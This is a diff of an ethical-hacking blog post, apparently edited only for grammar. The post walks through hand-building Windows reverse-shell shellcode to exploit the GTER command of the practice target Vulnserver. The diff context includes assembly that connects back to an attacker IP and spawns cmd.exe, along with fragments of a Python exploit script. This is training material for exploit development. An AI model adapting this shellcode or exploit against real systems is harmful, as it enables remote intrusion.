--- a/content/blog/vulnserver-gter-no-egghunter/index.adoc
+++ b/content/blog/vulnserver-gter-no-egghunter/index.adoc
@@ -1,11 +1,11 @@
 :slug: vulnserver-gter-no-egghunter/
-:date: 2020-06-11
+:date: 2020-06-12
 :category: attacks
 :subtitle: Every byte counts
 :tags: challenge, ethical hacking, pentesting, security, training, exploit
 :image: cover.png
 :alt: Photo by Florian Klauer on Unsplash
-:description: In the previous post, we successfully exploited GTER command of Vulnserver using a technique called "Egghunting". It was needed to use that approach because we had a reduced space to work. In this post we will see an alternative way of exploiting this command.
+:description: In the previous post, we successfully exploited the GTER command of Vulnserver using a technique called 'Egghunting.' It was needed to use that approach because we had a reduced space to work. In this post, we will see an alternative way of exploiting this command.
 :keywords: Bussiness, Information, Security, Protection, Hacking, Exploit, OSCE
 :author: Andres Roldan
 :writer: aroldan
@@ -14,10 +14,10 @@
 :about2: "We don't need the key, we'll break in" RATM
 :source: https://unsplash.com/photos/mk7D-4UCfmg
 
-= GTER exploit by reusing sockets
+= GTER Exploit by Reusing Sockets
 
 This is the third article on the series of exploiting `Vulnserver`,
-a VbD (Vulnerable-by-Design) application in which you can practice Windows
+a `VbD` (Vulnerable-by-Design) application in which you can practice Windows
 exploit development.
 
 In our link:../vulnserver-gter/[previous post], we successfully exploited
@@ -32,9 +32,9 @@ reduce the final length of our payload.
 
 == Reverse shellcode X-ray
 
-A reverse shellcode is basically a series of Windows API function calls,
-arranged in a delicate order to make a victim machine connects back to the
-attacker machine, issuing a Windows shell which is commonly an instance
+A reverse shellcode is basically a series of Windows `API` function calls
+arranged in a delicate order to make a victim machine connect back to an
+attacker machine issuing a Windows shell, which is commonly an instance
 of `cmd.exe`.
 
 The order of execution of a fully crafted shellcode is the following:
@@ -44,12 +44,13 @@ The order of execution of a fully crafted shellcode is the following:
 . Call `socket()` or `WSASocketA()` to bind a new socket handle.
 . Call `connect()` or `WSAConnect()` to establish a connection to the
 attacker machine.
-. Call `CreateProcessA()` which calls `cmd.exe` and where the `STDIN`, `STDOUT`,
-and `STDERR` are redirected to the previously generated socket handle.
+. Call `CreateProcessA()`, which calls `cmd.exe`
+and where the `STDIN`, `STDOUT`, and `STDERR`
+are redirected to the previously generated socket handle.
 
-However, if we are exploiting a TCP/IP server like `Vulnserver`, chances are
-that the 'WinSock' DLL library is already loaded and initialized, so we can
-skip the first point on our custom shellcode.
+However, if we are exploiting a `TCP/IP` server like `Vulnserver`,
+the chances are that the 'WinSock' DLL library is already loaded
+and initialized. So we can skip the first point on our custom shellcode.
 
 As a reference, let's create a reverse shellcode using `msfvenom`:
 
@@ -73,9 +74,9 @@ we only had around 144 bytes to play.
 The whole idea of reusing instructions is to minimize the resultant shellcode.
 
 To do that, we need to know what functions need to be called, with what
-parameters, and translate that to Assembler language to then convert it to
-our shellcode, having in mind to avoid null bytes that will led to become
-our shellcode unusable. It sounds harder than it really is.
+parameters, and translate that into Assembler language to then convert it into
+our shellcode, keeping in mind to avoid the null bytes that would lead
+to making our shellcode unusable. It sounds harder than it really is.
 
 With that in mind, let's look at the signatures of the needed functions:
 
@@ -94,33 +95,32 @@ SOCKET WSAAPI WSASocketA(
 );
 ----
 
-If we are going to write this in assembler, we must remind that in the
-x86 architecture, the functions are called in a very specific way:
+If we are going to write this in Assembler, we must remember
+that in the x86 architecture the functions are called in a very specific way:
 
-. The parameters are pushed to the stack on reverse order
-. Then we call the required function
-. That function will store the returned value on `EAX`
+. The parameters are pushed to the stack on reverse order.
+. We call the required function.
+. That function will store the returned value on `EAX`.
 
 For example, the structure for calling `WSASocketA` function is as follows:
 
-. Push `dwFlags` parameter to the stack
-. Push `g` parameter to the stack
-. Push `lpProtocolInfo` parameter to the stack
-. Push `protocol` parameter to the stack
-. Push `type` parameter to the stack
-. Push `af` parameter to the stack
-. Call `WSASocketA()`
+. Push `dwFlags` parameter to the stack.
+. Push `g` parameter to the stack.
+. Push `lpProtocolInfo` parameter to the stack.
+. Push `protocol` parameter to the stack.
+. Push `type` parameter to the stack.
+. Push `af` parameter to the stack.
+. Call `WSASocketA()`.
 . Retrieve the return value of `WSASocketA()` from `EAX` which is the
-resulting socket handle
+resulting socket handle.
 
 We also need to know the exact address of the `WSASocketA()` on the system.
-Normally, those function addresses won't change much on a specific versions
-of Windows, but will likely change over different updates, so keep that
-in mind when creating custom shellcodes.
+Normally, those function addresses won't change much on a specific version
+of Windows but will likely change over different updates,
+so keep that in mind when creating custom shellcodes.
 
-For retrieving the addresss of functions on the current OS,
-you can use the link:http://www.vividmachines.com/shellcode/arwin.c[arwin]
-tool:
+For retrieving the addresses of functions on the current `OS`,
+you can use the link:http://www.vividmachines.com/shellcode/arwin.c[arwin] tool:
 
 .arwin finding WSASocketA()
 [source,bash]
@@ -131,7 +131,7 @@ WSASocketA is located at 0x71ab8b6a in ws2_32
 ----
 
 Ok, with all the required information, we can proceed to write some Assembler.
-We need to get a socket handle that can be used by a TCP connection.
+We need to get a socket handle that can be used by a `TCP` connection.
 With that in mind, we can write the call to `WSASocketA()`:
 
 .WSASocketA() in ASM
@@ -158,8 +158,8 @@ need in the forthcoming functions.
 
 === connect()
 
-The `connect()` call will actually create the connection back to the
-attacker, using the socket handle created by `WSASocketA` that we stored en ESI:
+The `connect()` call will create the connection back to the attacker
+using the socket handle generated by `WSASocketA` that we stored in ESI:
 
 .connect() signature
 [source,cpp]
@@ -191,10 +191,10 @@ arwin - win32 address resolution program - by steve hanna - v.01
 connect is located at 0x71ab4a07 in ws2_32
 ----
 
-Now that we know the structure of the `connect()` function call, and the
-address of the function, we can write it in Assembler:
+Now that we know the structure of the `connect()` function call
+and the address of the function, we can write it in Assembler:
 
-.connect() in assembler
+.connect() in Assembler
 [source,asm]
 ----
 push 0x1400a8c0         ; Push attacker IP: 192.168.0.20. In reverse order:
@@ -214,13 +214,13 @@ mov ebx,0x71ab4a07      ; Address of connect() on WinXPSP3
 call ebx                ; Call connect()
 ----
 
-Note that the attacker IP address parameter contains a null byte which
-will stop the injection of the payload. To overcome that, we can add a
-static value to that address, substract it again, and push the result.
-This will be the final `connect()` payload:
+Note that the attacker `IP` address parameter contains a null byte,
+which will stop the injection of the payload. To overcome that,
+we can add a static value to that address, subtract it again,
+and push the result. This will be the final `connect()` payload:
 
 
-.connect() in assembler
+.connect() in Assembler
 [source,asm]
 ----
 mov ebx,0x6955fe15      ; Attacker IP: 192.168.0.20. In reverse order:
@@ -246,9 +246,9 @@ call ebx                ; Call connect()
 
 === CreateProcessA()
 
-Now comes the final function `CreateProcessA()` which is responsible for
+Now comes the final function `CreateProcessA()`, which is responsible for
 creating an instance of the `cmd.exe` command. We also need to point the
-STDIN, STDOUT and STDERR descriptors to our socket handle to make the
+`STDIN`, `STDOUT` and `STDERR` descriptors to our socket handle to make the
 resultant shell interactive for us.
 
 .CreateProcessA() signature
@@ -317,9 +317,9 @@ arwin - win32 address resolution program - by steve hanna - v.01
 CreateProcessA is located at 0x7c80236b in kernel32
 ----
 
-In assembler, the call to `CreateProcessA()` will look like this:
+In Assembler, the call to `CreateProcessA()` will look like this:
 
-.CreateProcessA() in assembler
+.CreateProcessA() in Assembler
 [source,asm]
 ----
 mov ebx,0x646d6341      ; Move 'cmda' to EBX. The trailing 'a' is to avoid
@@ -513,7 +513,7 @@ Now that we have our manually created shellcode, we can update our
 link:../vulnserver-gter/[previous exploit].
 
 We will remove the egghunter and the previous shellcode and will include our
-custom shellcode. Let's look how it looks now:
+custom shellcode. Let's see how it looks now:
 
 .exploit-socketreuse.py
 [source,python]
@@ -561,38 +561,38 @@ image::take1.gif[Take 1]
 
 Uhmmm, we got the reverse connection but no shell!
 
-Let's see what is going on
+Let's see what is going on:
 
 image::take2.gif[Take 1]
 
-As we can see, there's several things happening:
+As we can see, several things have happened:
 
-. Our buffer was correctly delivered
-. The `JMP ESP` instruction was successfully triggered
-. The jump backwards ocurred
-. And we landed at the start of our custom shellcode
+. Our buffer was correctly delivered.
+. The `JMP ESP` instruction was successfully triggered.
+. The jump backward occurred.
+. And we landed at the start of our custom shellcode.
 
-However, if you look carefully a this image:
+However, if you look carefully at this image:
 
 image::esp1.png[ESP]
 
-We can see that the ESP register is only 24 bytes below the end of our
+We can see that the `ESP` register is only 24 bytes below the end of our
 custom shellcode. That means that with every `PUSH` performed on our
-custom shellcode, that pointer will be going to be closer to our custom
-shellcode and will start *overwriting* it. That's not good news.
+custom shellcode, that pointer will get closer to it
+and start *overwriting* it. That's not good news.
 
-This graph will illustrate the issue:
+This graph illustrates the issue:
 
 image::stackgrowth.png[ESP]
 
-As the execution flows towards a higher memory address, the stack grows
-backwards and will eventually overwrite our shellcode.
+As the execution flows towards a higher memory address,
+the stack grows backward and will eventually overwrite our shellcode.
 
 However, if you look at the image again, you can see that the `EAX` register
-points to the `GTER /.:/` string which is above our shellcode.
+points to the `GTER /.:/` string, which is above our shellcode.
 
-All that's left to do is align the stack to point to that location and it's
-done easily with two instructions:
+All that's left to do is align the stack to point to that location,
+and it's done easily with two instructions:
 
 .Align stack
 [source,asm]
@@ -601,12 +601,12 @@ PUSH EAX
 POP ESP
 ----
 
-The first instruction will push the current value of `EAX` to the stack
+The first instruction will push the current value of `EAX` to the stack,
 and the second will pop back that value to the `ESP` register, moving the
 stack pointer above our shellcode, protecting it from being overwritten.
 
-We can use `nasm_shell.rb` from Metasploit to get the opcodes of that
-instructions
+We can use `nasm_shell.rb` from Metasploit
+to get the opcodes of those instructions:
 
 .nasm_shell
 [source,bash]
@@ -619,7 +619,7 @@ nasm > pop esp
 00000000  5C                pop esp
 ----
 
-Ok, now we can add that instructions to our exploit and see what happens:
+Ok, now we can add those instructions to our exploit and see what happens:
 
 .exploit-socketreuse.py
 [source,python]
@@ -664,7 +664,7 @@ with socket.create_connection((HOST, PORT)) as fd:
     print('Done.')
 ----
 
-And execute the exploit again...
+And execute the exploit again:
 
 image::success.gif[Shell]
 
